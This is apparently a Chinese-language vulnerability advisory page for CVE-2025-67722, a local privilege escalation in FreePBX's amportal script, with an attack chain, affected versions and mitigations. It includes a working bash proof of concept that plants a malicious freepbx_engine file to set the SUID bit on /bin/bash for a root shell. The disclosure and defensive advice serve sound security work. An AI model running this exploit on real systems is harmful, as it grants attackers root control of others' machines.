CVE-2025-67722 CVSS 7.8 高危

CVE-2025-67722 FreePBX amportal本地权限提升漏洞

披露日期: 2025-12-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67722

漏洞类型

本地权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FreePBX framework

漏洞概述

CVE-2025-67722是FreePBX框架中的一个高危本地权限提升漏洞。FreePBX是一个开源的基于Web的图形用户界面，用于管理Asterisk电话系统。该漏洞存在于已弃用的FreePBX启动脚本amportal中，攻击者利用文件系统权限配置不当，通过在/etc/asterisk/目录下植入恶意freepbx_engine文件，当amportal脚本执行时可获得root权限。由于/etc/asterisk/目录通常配置为asterisk用户和asterisk组成员可写，这使得任何asterisk组成员的低权限用户都能实现权限提升。攻击成功后，攻击者可完全控制系统，执行任意命令、访问敏感数据、修改系统配置。该漏洞CVSS评分7.8，属于高危级别，对系统机密性、完整性和可用性均造成严重影响。

技术细节

漏洞根源在于FreePBX的amportal启动脚本在查找freepbx_engine文件时使用不安全路径解析。该脚本会在/etc/asterisk/目录中查找freepbx_engine可执行文件，而FreePBX通常将这些目录配置为asterisk用户和asterisk组可写。攻击者（asterisk组成员）可在/etc/asterisk/目录中创建恶意的freepbx_engine脚本，该脚本将被以root权限执行。攻击利用了以下条件：1) amportal脚本以root权限运行；2) 脚本在可被低权限用户写入的目录中查找并执行文件；3) 目录权限配置允许asterisk组成员写入。当amportal执行时，通过exec系统调用加载攻击者植入的freepbx_engine文件，从而以root身份运行攻击者代码，实现从低权限用户到root用户的权限提升。

攻击链分析

STEP 1

步骤1

攻击者获得系统账户访问权限，并确认其为asterisk组成员

STEP 2

步骤2

攻击者在/etc/asterisk/目录中创建恶意的freepbx_engine脚本，包含反弹shell或添加SUID后门的代码

STEP 3

步骤3

等待amportal启动脚本执行，或通过特定触发条件使其执行

STEP 4

步骤4

amportal脚本以root权限查找并执行freepbx_engine文件，触发恶意代码

STEP 5

步骤5

攻击者获得root shell访问权限，实现完全系统控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-67722 PoC - FreePBX amportal Local Privilege Escalation
# Requirements: User must be a member of the 'asterisk' group

# Step 1: Verify user is in asterisk group
id | grep -q asterisk || { echo "[-] User not in asterisk group"; exit 1; }

# Step 2: Create malicious freepbx_engine script in /etc/asterisk/
cat > /etc/asterisk/freepbx_engine << 'EOF'
#!/bin/bash
# Malicious payload - adds SUID backdoor
chmod u+s /bin/bash
EOF

chmod +x /etc/asterisk/freepbx_engine

# Step 3: Wait for amportal execution (triggered by system service)
# Or trigger manually if permitted
# /usr/local/sbin/amportal

echo "[+] Payload planted in /etc/asterisk/freepbx_engine"
echo "[+] Waiting for amportal execution..."
echo "[+] After exploitation, run: /bin/bash -p"

影响范围

FreePBX framework < 16.0.45

FreePBX framework < 17.0.24

防御指南

临时缓解措施

临时缓解措施包括：1) 审计asterisk组成员，仅保留必要的可信用户；2) 检查/etc/asterisk/目录是否存在可疑的freepbx_engine文件（通过GUI的Admin->Config Edit或CLI）；3) 确认/etc/asterisk/asterisk.conf中live_dangerously=no配置；4) 移除可能导致文件系统操作的危险Asterisk功能；5) 考虑禁用或限制amportal脚本的使用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表